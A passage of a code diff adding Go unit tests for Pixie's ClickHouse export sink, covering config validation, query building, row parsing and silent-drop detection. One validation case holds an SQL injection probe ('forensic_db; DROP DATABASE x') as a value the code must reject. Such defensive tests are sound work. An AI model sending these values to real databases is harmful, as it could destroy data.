+			t.Fatalf("body missing %q; body=%s", needle, gotBody)
+		}
+	}
+	if !strings.Contains(gotBody, `"t_start":"2025-04-12 16:57:40.303026359"`) { // TStart = LastSeen - 5m, nanosecond precision
+		t.Fatalf("t_start not formatted as DateTime64 string; body=%s", gotBody)
+	}
+}
+
+// TestSink_Write_EmptyBatch — a nil batch returns nil with no HTTP call.
+func TestSink_Write_EmptyBatch(t *testing.T) {
+	called := false
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		called = true // any request at all fails the check below
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	if err := s.Write(context.Background(), nil); err != nil {
+		t.Fatalf("Write empty: %v", err)
+	}
+	if called {
+		t.Fatalf("empty Write made an HTTP call")
+	}
+}
+
+// TestSink_Write_HTTPErrorPropagates — a 503 reply must surface as an error naming the status.
+func TestSink_Write_HTTPErrorPropagates(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(503)
+		_, _ = w.Write([]byte("clickhouse exploded")) // response body; its propagation is not asserted
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	err := s.Write(context.Background(), []AttributionRow{canonicalAttribution()})
+	if err == nil {
+		t.Fatalf("expected HTTP error")
+	}
+	if !strings.Contains(err.Error(), "503") {
+		t.Fatalf("error should mention 503: %v", err)
+	}
+}
+
+// TestSink_QueryActive_BuildsCorrectSQL — pins the SQL filters of the boot rehydration query and the decoding of one returned row.
+func TestSink_QueryActive_BuildsCorrectSQL(t *testing.T) {
+	var seenQuery string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		seenQuery = r.URL.Query().Get("query")
+		_, _ = w.Write([]byte(`{"anomaly_hash":"abc","namespace":"redis","pod":"redis-x","comm":"redis-server","pid":106040,"hostname":"node-1","t_start_ns":"1744477060303026359","t_end_ns":"1744477660303026359","last_seen_ns":"1744477360303026359","last_rule_id":"R1005","n_anomalies":1}` + "\n"))
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	rows, err := s.QueryActive(context.Background(), "node-1")
+	if err != nil {
+		t.Fatalf("QueryActive: %v", err)
+	}
+	if !strings.Contains(seenQuery, "FROM forensic_db.adaptive_attribution FINAL") {
+		t.Fatalf("missing FINAL: %q", seenQuery)
+	}
+	if !strings.Contains(seenQuery, "hostname = 'node-1'") {
+		t.Fatalf("missing hostname filter: %q", seenQuery)
+	}
+	if !strings.Contains(seenQuery, "t_end > now64(9)") {
+		t.Fatalf("missing t_end > now64 filter: %q", seenQuery)
+	}
+	if len(rows) != 1 || rows[0].AnomalyHash != "abc" {
+		t.Fatalf("rows = %+v", rows)
+	}
+	if rows[0].PID != 106040 { // pid arrives as a bare JSON number in the canned reply
+		t.Fatalf("PID = %d", rows[0].PID)
+	}
+	if rows[0].TStart.UnixNano() != 1744477060303026359 { // t_start_ns arrives as a quoted string
+		t.Fatalf("TStart wrong: %v", rows[0].TStart)
+	}
+}
+
+// TestSink_QueryActive_RequiresHostname — an empty hostname must be rejected with an error.
+func TestSink_QueryActive_RequiresHostname(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) // no-op handler: replies 200 with an empty body if reached
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	if _, err := s.QueryActive(context.Background(), ""); err == nil {
+		t.Fatalf("empty hostname should error")
+	}
+}
+
+// TestSink_QuoteEscape — quoteCH wraps the value in single quotes and backslash-escapes an embedded one.
+func TestSink_QuoteEscape(t *testing.T) {
+	if got := quoteCH("o'malley"); got != `'o\'malley'` {
+		t.Fatalf("quoteCH = %q, want 'o\\'malley'", got)
+	}
+}
+
+// TestSink_New_ValidationTable — one table row per Config validation
+// branch of New(): each bad field in isolation, plus happy-path
+// baselines that must yield a sink with a slash-free Endpoint and a
+// non-empty Database. Add a row whenever New() gains a validation.
+func TestSink_New_ValidationTable(t *testing.T) {
+	cases := []struct {
+		name           string
+		cfg            Config
+		wantErr        bool
+		wantErrSnippet string
+	}{
+		{
+			name: "happy path http",
+			cfg:  Config{Endpoint: "http://ch.example:8123", Database: "forensic_db"},
+		},
+		{
+			name: "happy path https + auth + custom timeout",
+			cfg: Config{
+				Endpoint: "https://ch.example:8443", Database: "forensic_db",
+				Username: "u", Password: "p", Timeout: 5 * time.Second,
+			},
+		},
+		{
+			name: "default database when empty",
+			cfg:  Config{Endpoint: "http://ch:8123"}, // Database empty → defaulted
+		},
+		{
+			name: "trailing slash stripped",
+			cfg:  Config{Endpoint: "http://ch:8123/"}, // OK; New() strips it
+		},
+		{
+			name:           "empty endpoint",
+			cfg:            Config{},
+			wantErr:        true,
+			wantErrSnippet: "empty endpoint",
+		},
+		{
+			name:           "relative endpoint (no scheme)",
+			cfg:            Config{Endpoint: "ch:8123"},
+			wantErr:        true,
+			wantErrSnippet: "absolute http(s) URL",
+		},
+		{
+			name:           "bare path",
+			cfg:            Config{Endpoint: "/clickhouse"},
+			wantErr:        true,
+			wantErrSnippet: "absolute http(s) URL",
+		},
+		{
+			name:           "ftp scheme rejected",
+			cfg:            Config{Endpoint: "ftp://ch:21"},
+			wantErr:        true,
+			wantErrSnippet: "absolute http(s) URL",
+		},
+		{
+			name:           "endpoint with query string",
+			cfg:            Config{Endpoint: "http://ch:8123?foo=bar"},
+			wantErr:        true,
+			wantErrSnippet: "must not include query parameters or a fragment",
+		},
+		{
+			name:           "endpoint with fragment",
+			cfg:            Config{Endpoint: "http://ch:8123#frag"},
+			wantErr:        true,
+			wantErrSnippet: "must not include query parameters or a fragment",
+		},
+		{
+			name:           "Database with hyphen rejected",
+			cfg:            Config{Endpoint: "http://ch:8123", Database: "forensic-db"},
+			wantErr:        true,
+			wantErrSnippet: "invalid Database identifier",
+		},
+		{
+			name:           "Database with semicolon rejected (SQL injection probe)",
+			cfg:            Config{Endpoint: "http://ch:8123", Database: "forensic_db; DROP DATABASE x"},
+			wantErr:        true,
+			wantErrSnippet: "invalid Database identifier",
+		},
+		{
+			name:           "Database starting with digit rejected",
+			cfg:            Config{Endpoint: "http://ch:8123", Database: "1bad"},
+			wantErr:        true,
+			wantErrSnippet: "invalid Database identifier",
+		},
+		{
+			name:           "negative Timeout rejected",
+			cfg:            Config{Endpoint: "http://ch:8123", Timeout: -1 * time.Second},
+			wantErr:        true,
+			wantErrSnippet: "Timeout must be >= 0",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			s, err := New(c.cfg)
+			if c.wantErr {
+				if err == nil {
+					t.Fatalf("want error containing %q, got nil", c.wantErrSnippet)
+				}
+				if !strings.Contains(err.Error(), c.wantErrSnippet) {
+					t.Fatalf("error %q does not contain %q", err.Error(), c.wantErrSnippet)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("unexpected error: %v", err)
+			}
+			if s == nil {
+				t.Fatalf("New returned nil sink without error")
+			}
+			// Normalisation is observable on the sink's stored cfg copy.
+			if strings.HasSuffix(s.cfg.Endpoint, "/") {
+				t.Fatalf("trailing slash not stripped: %q", s.cfg.Endpoint)
+			}
+			if s.cfg.Database == "" {
+				t.Fatalf("Database default not applied")
+			}
+		})
+	}
+}
+
+// TestValidateTableIdentifier_TableDriven — plain and single-dotted names
+// (e.g. "kafka_events.beta") pass; empty, spaced, hyphenated or mis-dotted names fail.
+func TestValidateTableIdentifier_TableDriven(t *testing.T) {
+	good := []string{"http_events", "redis_events", "http2_messages.beta", "kafka_events.beta", "_underscore_start"}
+	bad := []string{"", "1bad", "http events", "http;drop", "x..y", ".leading", "trailing.", "with-hyphen"}
+	for _, g := range good {
+		if err := validateTableIdentifier(g); err != nil {
+			t.Errorf("validateTableIdentifier(%q): unexpected error %v", g, err)
+		}
+	}
+	for _, b := range bad {
+		if err := validateTableIdentifier(b); err == nil {
+			t.Errorf("validateTableIdentifier(%q): want error, got nil", b)
+		}
+	}
+}
+
+// TestUintFromRaw_HandlesQuotedAndBareJSON — uintFromRaw must accept a
+// UInt64 in both bare (`12345`) and quoted (`"12345"`) JSON form,
+// up to the uint64 maximum (i.e. beyond INT64_MAX).
+func TestUintFromRaw_HandlesQuotedAndBareJSON(t *testing.T) {
+	cases := []struct {
+		name  string
+		input string
+		want  uint64
+	}{
+		{"bare", `12345`, 12345},
+		{"quoted", `"12345"`, 12345},
+		{"max int64", `9223372036854775807`, 9223372036854775807},
+		{"above int64", `"18446744073709551615"`, 18446744073709551615}, // math.MaxUint64
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			got, err := uintFromRaw([]byte(c.input))
+			if err != nil {
+				t.Fatalf("uintFromRaw(%q): %v", c.input, err)
+			}
+			if got != c.want {
+				t.Fatalf("uintFromRaw(%q) = %d, want %d", c.input, got, c.want)
+			}
+		})
+	}
+}
+
+// TestUintFromRaw_RejectsGarbage — empty, non-numeric, negative and
+// fractional inputs must return an error rather than a silent 0.
+func TestUintFromRaw_RejectsGarbage(t *testing.T) {
+	bad := []string{"", `""`, `"abc"`, `-1`, `"-1"`, `1.5`}
+	for _, b := range bad {
+		if _, err := uintFromRaw([]byte(b)); err == nil {
+			t.Errorf("uintFromRaw(%q): want error, got nil", b)
+		}
+	}
+}
+
+// chunkedReader is an io.Reader test double that serves a body as a
+// sequence of pre-cut chunks, never crossing a chunk boundary within a
+// single Read and sleeping for delay whenever a chunk is used up. A
+// short destination buffer resumes mid-chunk on the next call.
+type chunkedReader struct {
+	chunks   [][]byte
+	idx      int           // index of the chunk currently being served
+	off      int           // read position inside chunks[idx]
+	delay    time.Duration // pause after finishing each chunk
+	produced int64         // running total of bytes returned
+}
+
+func (r *chunkedReader) Read(p []byte) (int, error) {
+	if r.idx >= len(r.chunks) {
+		return 0, io.EOF // every chunk has been handed out
+	}
+	pending := r.chunks[r.idx][r.off:]
+	n := copy(p, pending)
+	r.produced += int64(n)
+	if n < len(pending) {
+		r.off += n // p was smaller than the remainder: resume here next call
+		return n, nil
+	}
+	r.idx, r.off = r.idx+1, 0
+	time.Sleep(r.delay)
+	return n, nil
+}
+
+// TestParseActiveRowsStream_BoundsMemory — feeds a ~5 MiB synthetic
+// JSONEachRow body to parseActiveRowsStream in 64 KiB chunks and
+// asserts that every row is decoded (row count plus a spot-check of
+// the last PID). NOTE(review): despite the name, nothing here measures
+// allocation or peak memory — the streaming claim is exercised only
+// indirectly through the chunked reader. TODO: add an allocation
+// bound (e.g. runtime.MemStats) or rename the test.
+func TestParseActiveRowsStream_BoundsMemory(t *testing.T) {
+	const targetRows = 5000 // ~5MiB at ~1KiB/row
+	var buf bytes.Buffer
+	row := func(i int) string {
+		return fmt.Sprintf(`{"anomaly_hash":"%032x","namespace":"redis","pod":"p","comm":"c","pid":%d,"hostname":"h","t_start_ns":%d,"t_end_ns":%d,"last_seen_ns":%d,"last_rule_id":"R0001","n_anomalies":%d,"_pad":"%s"}`+"\n",
+			i, i, 1700000000000000000+int64(i), 1700000000000000000+int64(i)+300_000_000_000, 1700000000000000000+int64(i)+150_000_000_000, i, strings.Repeat("x", 800))
+	}
+	for i := 0; i < targetRows; i++ {
+		buf.WriteString(row(i))
+	}
+	body := buf.Bytes()
+
+	const chunkSize = 64 * 1024
+	chunks := make([][]byte, 0, len(body)/chunkSize+1)
+	for off := 0; off < len(body); off += chunkSize {
+		end := off + chunkSize
+		if end > len(body) {
+			end = len(body)
+		}
+		chunks = append(chunks, body[off:end])
+	}
+	rdr := &chunkedReader{chunks: chunks, delay: 0}
+
+	rows, err := parseActiveRowsStream(rdr)
+	if err != nil {
+		t.Fatalf("parseActiveRowsStream: %v", err)
+	}
+	if len(rows) != targetRows {
+		t.Fatalf("parsed %d rows, want %d", len(rows), targetRows)
+	}
+	// Spot-check round-trip on one row (last element): pid was written as the row index.
+	if rows[targetRows-1].PID != uint64(targetRows-1) {
+		t.Fatalf("last row PID = %d, want %d", rows[targetRows-1].PID, targetRows-1)
+	}
+}
+
+// TestParseActiveRowsStream_RejectsOverlongLine — guards against
+// pathological CH responses with multi-MiB single rows: a row padded
+// past 2 MiB must come back as a "QueryActive scan" error. The cap
+// itself is presumably 1 MiB (per the failure message) — confirm in the parser.
+func TestParseActiveRowsStream_RejectsOverlongLine(t *testing.T) {
+	huge := strings.Repeat("a", 2*1024*1024)
+	body := fmt.Sprintf(`{"anomaly_hash":"x","_pad":"%s"}`+"\n", huge)
+	_, err := parseActiveRowsStream(strings.NewReader(body))
+	if err == nil {
+		t.Fatalf("expected scanner error on >1MiB line; got nil")
+	}
+	if !strings.Contains(err.Error(), "QueryActive scan") {
+		t.Fatalf("expected scan error, got: %v", err)
+	}
+}
+
+// TestParseActiveRows_RoundTripFromBytes — covers the byte-slice wrapper
+// with a single row whose numeric fields are all bare (unquoted) JSON numbers.
+func TestParseActiveRows_RoundTripFromBytes(t *testing.T) {
+	body := []byte(`{"anomaly_hash":"deadbeef","namespace":"redis","pod":"p","comm":"c","pid":42,"hostname":"node-01","t_start_ns":1700000000000000000,"t_end_ns":1700000000300000000,"last_seen_ns":1700000000150000000,"last_rule_id":"R0001","n_anomalies":1}` + "\n")
+	rows, err := parseActiveRows(body)
+	if err != nil {
+		t.Fatalf("parseActiveRows: %v", err)
+	}
+	if len(rows) != 1 || rows[0].Pod != "p" || rows[0].PID != 42 {
+		t.Fatalf("round-trip mismatch: %+v", rows)
+	}
+}
+
+// pixieRow builds the fifteen-column redis-flavoured row map fed to WritePixieRows by the tests below.
+func pixieRow() map[string]any {
+	row := make(map[string]any, 15)
+	row["time_"] = time.Unix(0, 1700000000000000000).UTC()
+	row["upid"] = "1234:5678:9"
+	row["namespace"] = "redis"
+	row["pod"] = "redis/redis-1"
+	row["req_cmd"] = "GET"
+	row["req_args"] = ""
+	row["resp"] = "OK"
+	row["latency"] = int64(123456)
+	row["remote_addr"] = "10.0.0.1"
+	row["remote_port"] = int64(6379)
+	row["local_addr"] = "10.0.0.2"
+	row["local_port"] = int64(34567)
+	row["trace_role"] = int64(2)
+	row["encrypted"] = false
+	row["px_info_"] = ""
+	return row
+}
+
+// TestWritePixieRows_HappyPath — CH answers 200 with `written_rows`
+// equal to the one row sent in X-ClickHouse-Summary; WritePixieRows
+// must return nil. Baseline for the drop-detection tests in this file.
+func TestWritePixieRows_HappyPath(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("X-ClickHouse-Summary",
+			`{"read_rows":"1","read_bytes":"100","written_rows":"1","written_bytes":"100",`+
+				`"total_rows_to_read":"0","result_rows":"1","result_bytes":"100","elapsed_ns":"1000000"}`)
+		w.WriteHeader(200) // headers must be set before this call to be sent
+	}))
+	defer srv.Close()
+	s, err := New(Config{Endpoint: srv.URL})
+	if err != nil {
+		t.Fatalf("New: %v", err)
+	}
+	if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil {
+		t.Fatalf("WritePixieRows: %v", err)
+	}
+}
+
+// TestWritePixieRows_DetectsSilentZeroWriteDrop — regression for the
+// silent-data-loss bug observed on the live operator:
+//
+//	sink: pixie write completed
+//	rows_sent=1658
+//	body_bytes=2098817
+//	ch_summary="{...,"written_rows":"0",...}"
+//	table=redis_events
+//
+// CH returned 2xx but `X-ClickHouse-Summary.written_rows` was zero
+// for a 1658-row payload — i.e. CH silently dropped every row. The
+// operator must NOT report success in that case; otherwise the
+// caller treats the batch as durably persisted and we lose data.
+func TestWritePixieRows_DetectsSilentZeroWriteDrop(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		// Real CH summary header from the operator-pod log on
+		// 2026-05-23T20:58:39Z, table=redis_events.
+		w.Header().Set("X-ClickHouse-Summary",
+			`{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0",`+
+				`"total_rows_to_read":"0","result_rows":"0","result_bytes":"0","elapsed_ns":"23034181"}`)
+		w.WriteHeader(200)
+	}))
+	defer srv.Close()
+	s, err := New(Config{Endpoint: srv.URL})
+	if err != nil {
+		t.Fatalf("New: %v", err)
+	}
+	// Send a real (non-zero) batch — a zero-input batch short-circuits
+	// before the HTTP call so the assertion would never fire.
+	batch := make([]map[string]any, 1658)
+	for i := range batch {
+		batch[i] = pixieRow()
+	}
+	err = s.WritePixieRows(context.Background(), "redis_events", batch)
+	if err == nil {
+		t.Fatalf("expected error from silent-drop (rows_sent=%d, written_rows=0), got nil", len(batch))
+	}
+	if !strings.Contains(err.Error(), "0") || !strings.Contains(err.Error(), "1658") { // NOTE(review): Contains("0") is weak — any '0' digit in the message satisfies it
+		t.Fatalf("error should mention both written_rows=0 and rows_sent=1658 for diagnosis; got: %v", err)
+	}
+}
+
+// TestWritePixieRows_DetectsPartialWriteDrop — CH reports written_rows=100
+// for a 200-row batch; a shortfall must be an error, as in the zero-write case.
+func TestWritePixieRows_DetectsPartialWriteDrop(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("X-ClickHouse-Summary",
+			`{"read_rows":"100","read_bytes":"10000","written_rows":"100","written_bytes":"10000",`+
+				`"total_rows_to_read":"0","result_rows":"100","result_bytes":"10000","elapsed_ns":"1000000"}`)
+		w.WriteHeader(200)
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	batch := make([]map[string]any, 200) // sent 200, CH says wrote 100
+	for i := range batch {
+		batch[i] = pixieRow()
+	}
+	err := s.WritePixieRows(context.Background(), "redis_events", batch)
+	if err == nil {
+		t.Fatalf("expected error on partial write (sent=200, written=100); got nil")
+	}
+}
+
+// TestWritePixieRows_NoSummaryHeaderIsTolerated — older CH versions
+// (or proxies) may strip the X-ClickHouse-Summary header. A 200 reply
+// without the header must be treated as success, not as a drop.
+func TestWritePixieRows_NoSummaryHeaderIsTolerated(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(200) // no summary header at all
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil {
+		t.Fatalf("missing summary header must not error; got: %v", err)
+	}
+}
+
+// TestWritePixieRows_EmptyBatchShortCircuits — a nil batch returns nil
+// without touching HTTP, so it can never look like a "silent drop".
+func TestWritePixieRows_EmptyBatchShortCircuits(t *testing.T) {
+	called := false
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		called = true // any request at all fails the check below
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	if err := s.WritePixieRows(context.Background(), "redis_events", nil); err != nil {
+		t.Fatalf("empty WritePixieRows: %v", err)
+	}
+	if called {
+		t.Fatalf("empty batch made an HTTP call")
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go
new file mode 100644
index 00000000000..24e385bd384
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go
@@ -0,0 +1,262 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "encoding/json"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "regexp"
+ "strings"
+ "testing"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// I1 — schema invariant.
+//
+// For every table in clickhouse.PixieTables(), fetches its DDL and
+// asserts that a column named `content_type`, where present, is
+// declared exactly `Int64` (the comparison is case-sensitive).
+// Catches a future PR that changes the column to String /
+// Nullable(Int64) / etc. without updating the encoder side.
+func TestContract_ContentTypeIsInt64InSchema(t *testing.T) {
+	// Reach the canonical schema via the public DDL(table) API so this
+	// test stays decoupled from the embed-internal var name.
+	type col struct {
+		table string
+		typ   string
+	}
+	var found []col
+	colRE := regexp.MustCompile(`(?m)^\s*content_type\s+([A-Za-z0-9_()]+)`) // group 1 = declared type, e.g. Int64 or Nullable(Int64)
+	for _, table := range clickhouse.PixieTables() {
+		ddl, err := clickhouse.DDL(table)
+		if err != nil {
+			t.Fatalf("DDL(%q): %v", table, err)
+		}
+		if m := colRE.FindStringSubmatch(ddl); m != nil { // first match only; tables without the column are skipped
+			found = append(found, col{table: table, typ: strings.TrimRight(m[1], ",")}) // NOTE(review): TrimRight is a no-op — the capture class excludes ','
+		}
+	}
+	if len(found) == 0 {
+		t.Fatalf("no content_type column found in PixieTables — did the column get renamed? Audit the encoder side too.")
+	}
+	for _, c := range found {
+		if c.typ != "Int64" {
+			t.Fatalf("schema drift: %s.content_type is %q, want Int64. CH input_format_skip_unknown_fields=1 will silent-drop encoder mismatches. Update encoder side together if intentional.", c.table, c.typ)
+		}
+	}
+	t.Logf("invariant I1 holds across %d tables: %v", len(found), found)
+}
+
+// I2 — encoder invariant.
+//
+// Calls encodePixieRowsFast directly with content_type set, in turn,
+// to int64 / int32 / int / json.Number, then re-parses the emitted
+// NDJSON line with UseNumber to confirm the value was written as a
+// JSON NUMBER, not a string. Every other column comes unchanged from
+// canonicalHTTPRow.
+func TestContract_FastEncodeContentTypeAsInt(t *testing.T) {
+	cases := []struct {
+		name string
+		v    any
+	}{
+		{"int64", int64(2)},
+		{"int32", int32(2)},
+		{"int", 2},
+		{"json.Number", json.Number("2")},
+	}
+	cols := minHTTPRowCols() // NOTE(review): never asserted on — only discarded via `_ = cols` below
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			row := canonicalHTTPRow()
+			row["content_type"] = c.v
+			var buf bytes.Buffer
+			// stage the fast-path column cache the same way production
+			// does via clickhouse.Columns — we don't reach into the
+			// package-private cache; encodePixieRowsFast already does
+			// the lookup itself.
+			if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil {
+				t.Fatalf("encodePixieRowsFast: %v", err)
+			}
+			line := strings.TrimSpace(buf.String())
+			// Parse with json.Decoder + UseNumber so we see whether the
+			// emitter wrote "content_type":2 (number) vs "2" (string).
+			d := json.NewDecoder(strings.NewReader(line))
+			d.UseNumber()
+			var parsed map[string]any
+			if err := d.Decode(&parsed); err != nil {
+				t.Fatalf("decode emitted line: %v\nline=%s", err, line)
+			}
+			ct, ok := parsed["content_type"]
+			if !ok {
+				t.Fatalf("emitted line missing content_type; line=%s", line)
+			}
+			if _, isNum := ct.(json.Number); !isNum { // with UseNumber, JSON numbers decode to json.Number and strings to string
+				t.Fatalf("content_type emitted as %T (%v), want JSON number — CH would silent-drop a non-number into an Int64 column. line=%s", ct, ct, line)
+			}
+			_ = cols // TODO(review): either check these columns are JSON numbers too, or drop cols
+		})
+	}
+}
+
+// I3 — silent-drop must be loud.
+//
+// A stub CH drains the body and answers 200 OK with written_rows=0 for a
+// one-row batch; the sink must return an error containing "silent drop".
+func TestContract_SilentDropDetected(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		_, _ = io.Copy(io.Discard, r.Body) // drain the request body before replying
+		w.Header().Set("X-ClickHouse-Summary", `{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0"}`)
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+
+	s, err := New(Config{Endpoint: srv.URL})
+	if err != nil {
+		t.Fatalf("New: %v", err)
+	}
+	err = s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()})
+	if err == nil {
+		t.Fatalf("WritePixieRows returned nil on written_rows=0 reply — silent-drop detection is broken")
+	}
+	if !strings.Contains(err.Error(), "silent drop") {
+		t.Fatalf("error %q does not mention 'silent drop' — runbook-grep will miss it", err.Error())
+	}
+}
+
+// I3.b — sibling guard: when CH reports written_rows equal to the rows
+// sent (1 of 1 here) the sink must NOT error. Pins the summary parse so
+// a future refactor doesn't false-positive every successful write.
+func TestContract_SilentDropNotTriggeredOnSuccess(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		_, _ = io.Copy(io.Discard, r.Body)
+		w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`) // minimal summary: only the field under test
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil {
+		t.Fatalf("WritePixieRows errored on success summary: %v", err)
+	}
+}
+
+// I3.c — header absence is tolerated (older CH versions / proxies
+// strip it). Documents the policy decision so a future "tighten the
+// gate" PR doesn't break clusters whose replies lack the header.
+func TestContract_SilentDropToleratesMissingSummaryHeader(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		_, _ = io.Copy(io.Discard, r.Body)
+		// no X-ClickHouse-Summary header
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+	s, _ := New(Config{Endpoint: srv.URL})
+	if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil {
+		t.Fatalf("WritePixieRows errored on missing summary header: %v (policy is tolerate-missing)", err)
+	}
+}
+
+// I4 — sends one http_events row through WritePixieRows to a recording
+// httptest server and asserts three things: the query is an INSERT into
+// http_events in JSONEachRow format, the on-wire body carries
+// content_type as a number, and the body is exactly one NDJSON line.
+func TestContract_HTTPEventsRoundTrip(t *testing.T) {
+	var gotQuery, gotBody string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotQuery = r.URL.Query().Get("query")
+		b, _ := io.ReadAll(r.Body)
+		gotBody = string(b)
+		// echo back a successful summary so the silent-drop guard is satisfied
+		w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`)
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+
+	s, _ := New(Config{Endpoint: srv.URL})
+	if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil {
+		t.Fatalf("WritePixieRows: %v", err)
+	}
+	if !strings.Contains(gotQuery, "INSERT INTO ") {
+		t.Fatalf("query missing INSERT INTO; got %q", gotQuery)
+	}
+	if !strings.Contains(gotQuery, "http_events") {
+		t.Fatalf("query doesn't target http_events; got %q", gotQuery)
+	}
+	if !strings.Contains(gotQuery, "FORMAT JSONEachRow") {
+		t.Fatalf("query missing FORMAT JSONEachRow; got %q", gotQuery)
+	}
+	if !strings.Contains(gotBody, `"content_type":2`) {
+		t.Fatalf("body has content_type as non-number (CH would silent-drop). body=%s", gotBody)
+	}
+	// One NDJSON line per row → exactly one line once trailing newlines are trimmed.
+	sc := bufio.NewScanner(strings.NewReader(strings.TrimRight(gotBody, "\n")))
+	n := 0
+	for sc.Scan() { // NOTE(review): sc.Err() is never checked; a scan failure would only show up as a wrong count
+		n++
+	}
+	if n != 1 {
+		t.Fatalf("body has %d NDJSON lines, want 1; body=%s", n, gotBody)
+	}
+}
+
+// canonicalHTTPRow builds the reference http_events row used by the
+// contract tests: every column is a string or an int64, with
+// content_type pinned to int64(2). NOTE(review): keeping this in step
+// with the schema looks like a manual job — confirm how a missing
+// column surfaces (the fast encoder's unsupported-row error?).
+func canonicalHTTPRow() map[string]any {
+	row := make(map[string]any, 25)
+	row["time_"] = int64(1_717_200_000_000_000_000)
+	row["upid"] = "00000000-0000-0000-0000-000000000001"
+	row["hostname"] = "node-1"
+	row["namespace"] = "redis"
+	row["pod"] = "redis-578d5dc9bd-kjj78"
+	row["remote_addr"] = "10.0.0.1"
+	row["remote_port"] = int64(443)
+	row["local_addr"] = "10.0.0.2"
+	row["local_port"] = int64(48000)
+	row["trace_role"] = int64(1)
+	row["encrypted"] = int64(0)
+	row["major_version"] = int64(1)
+	row["minor_version"] = int64(1)
+	row["content_type"] = int64(2) // JSON — the schema-honest int
+	row["latency"] = int64(123_456)
+	row["req_headers"] = `{"User-Agent":"curl/8"}`
+	row["req_method"] = "GET"
+	row["req_path"] = "/x"
+	row["req_body"] = ""
+	row["req_body_size"] = int64(0)
+	row["resp_headers"] = `{"Content-Type":"application/json"}`
+	row["resp_status"] = int64(200)
+	row["resp_message"] = "OK"
+	row["resp_body"] = "{}"
+	row["resp_body_size"] = int64(2)
+	return row
+}
+
+// minHTTPRowCols lists the integer-valued http_events columns of the
+// canonical row; its only visible caller discards the result.
+func minHTTPRowCols() []string {
+	return []string{
+		"content_type", "remote_port", "local_port", "trace_role", "encrypted", "major_version", "minor_version", "resp_status", "latency", "req_body_size", "resp_body_size",
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go
new file mode 100644
index 00000000000..ea147c07167
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go
@@ -0,0 +1,234 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
